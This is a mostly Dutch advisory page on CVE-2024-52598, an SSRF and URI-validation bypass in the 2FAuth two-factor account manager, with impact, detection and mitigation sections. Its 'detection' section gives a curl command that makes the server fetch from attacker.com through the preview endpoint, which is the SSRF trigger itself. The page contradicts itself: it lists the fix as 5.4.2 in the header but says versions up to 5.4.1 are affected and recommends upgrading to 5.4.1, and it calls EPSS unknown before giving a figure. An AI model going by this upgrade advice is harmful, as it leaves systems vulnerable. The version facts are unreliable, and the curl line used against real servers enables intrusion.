Platform
other
Component
2fauth
Opgelost in
5.4.2
CVE-2024-52598 beschrijft een Server-Side Request Forgery (SSRF) en URI-validatie bypass kwetsbaarheid in 2FAuth, een webapplicatie voor het beheren van Two-Factor Authentication (2FA) accounts. Deze kwetsbaarheid stelt een aanvaller in staat om de applicatie te dwingen verzoeken te doen naar willekeurige URL's, wat kan leiden tot data-exfiltratie en potentieel toegang tot interne systemen. De kwetsbaarheid treft versies van 2FAuth tot en met 5.4.1. Een fix is beschikbaar in versie 5.4.1.
Een succesvolle exploitatie van CVE-2024-52598 stelt een aanvaller in staat om een Server-Side Request Forgery (SSRF) aan te vallen. Dit betekent dat de applicatie, in plaats van de aanvaller, verzoeken naar externe bronnen doet. De aanvaller kan dit misbruiken om interne diensten te scannen die niet direct toegankelijk zijn vanaf het internet, gevoelige data te extraheren, of zelfs authenticatie-informatie te stelen. De URI-validatie bypass maakt het mogelijk om de beperkingen van de validatie te omzeilen, waardoor de impact van de SSRF nog groter wordt. Het risico is verhoogd omdat 2FAuth vaak wordt gebruikt voor het beveiligen van gevoelige accounts, waardoor de impact van een succesvolle aanval aanzienlijk kan zijn.
Op dit moment zijn er geen openbare exploitatiecampagnes bekend voor CVE-2024-52598. Er zijn ook geen publieke Proof-of-Concept (PoC) exploits beschikbaar. De kwetsbaarheid is opgenomen in het NVD (National Vulnerability Database) en gepubliceerd op 2024-11-20. De EPSS score is nog niet bekend, maar gezien de aard van de SSRF kwetsbaarheid en het potentieel voor data-exfiltratie, is een medium tot hoog risico waarschijnlijk.
Organizations using 2FAuth to manage two-factor authentication, particularly those with internal services accessible from the 2FAuth server, are at risk. Environments with weak network segmentation or inadequate WAF protection are especially vulnerable. Shared hosting environments where multiple users share the same 2FAuth instance could also be affected, potentially allowing an attacker to compromise other users' 2FA accounts.
• linux / server:
journalctl -u 2fauth -g "remote URI retrieval"• generic web:
curl -I <2fauth_server_ip>/api/v1/twofaccounts/preview -d 'uri=http://attacker.com/malicious_image.jpg' | grep -i 'Server:'disclosure
Exploit Status
EPSS
0.12% (31% percentiel)
CISA SSVC
CVSS-vector
De primaire mitigatie voor CVE-2024-52598 is het upgraden naar versie 5.4.1 van 2FAuth. Indien een directe upgrade niet mogelijk is, kan een tijdelijke workaround bestaan uit het implementeren van een Web Application Firewall (WAF) die verzoeken naar externe URL's blokkeert, met name die met ongebruikelijke of verdachte paden. Controleer de configuratie van 2FAuth om te verzekeren dat er geen onnodige toegang tot interne netwerkbronnen is. Monitor de applicatielogs op ongebruikelijke verzoeken of fouten die kunnen wijzen op een exploitatiepoging. Na de upgrade, controleer de applicatielogs en de functionaliteit van de 2FA-preview om te bevestigen dat de kwetsbaarheid is verholpen.
Actualiseer 2FAuth naar versie 5.4.1 of hoger. Deze versie corrigeert de Server Side Request Forgery (SSRF) en URI validatie omzeiling kwetsbaarheden. De update voorkomt dat externe aanvallers toegang krijgen tot interne resources via de applicatie.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2024-52598 is een Server-Side Request Forgery (SSRF) en URI-validatie bypass kwetsbaarheid in 2FAuth, waardoor een aanvaller willekeurige verzoeken kan initiëren.
Ja, als u een versie van 2FAuth gebruikt die ≤ 5.4.1, dan bent u getroffen door deze kwetsbaarheid.
Upgrade naar versie 5.4.1 van 2FAuth. Indien dit niet mogelijk is, implementeer dan een WAF om verzoeken naar externe URL's te blokkeren.
Op dit moment zijn er geen openbare exploitatiecampagnes bekend, maar het risico is aanzienlijk vanwege de aard van de SSRF kwetsbaarheid.
Raadpleeg de 2FAuth website of de NVD (National Vulnerability Database) voor het officiële advisory.
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.